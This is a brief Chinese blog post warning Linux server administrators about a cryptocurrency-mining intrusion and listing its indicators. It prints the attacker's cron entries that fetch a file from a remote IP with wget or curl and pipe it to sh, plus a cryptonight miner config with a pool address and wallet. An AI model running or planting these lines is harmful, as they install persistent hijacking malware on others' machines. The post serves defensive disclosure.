比特币挖矿机入侵了服务器

脚本如下

1.入侵者会在Linux服务器植入定时脚本如

*/9 * * * * wget -O - -q http://5.188.87.12/locales/arrow.jpg|sh
*/10 * * * * curl http://5.188.87.12/locales/arrow.jpg|sh

2.入侵通讯脚本次脚本在var/tmp 或者proc/进程号/下

jvdxbsjgds.conf
{
"url" : "stratum+tcp://158.69.25.71:80",
"user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
"pass" : "x",
"algo" : "cryptonight",
"quiet" : true
}

在此公布,请定时查询自己服务器是否由此脚本,会在服务器生成acpid 进程

请广大各位朋友做好安全措施防范

转载于:https://my.oschina.net/u/2894507/blog/1579990

你可能感兴趣的:(比特币挖矿机入侵了服务器)